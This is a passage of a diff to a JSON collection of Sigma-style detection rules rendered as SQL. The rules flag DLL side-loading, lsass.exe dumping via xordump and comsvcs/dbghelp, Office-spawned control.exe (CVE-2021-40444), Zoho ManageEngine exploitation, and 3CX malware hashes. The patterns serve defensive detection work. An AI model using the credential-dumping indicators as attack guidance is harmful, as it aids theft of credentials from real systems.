OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft 
shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), 
@neonprimetime", "tags": [ "attack.execution", "attack.t1059" 
@@ -5770,34 +5598,40 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", - "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "status": "test", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE 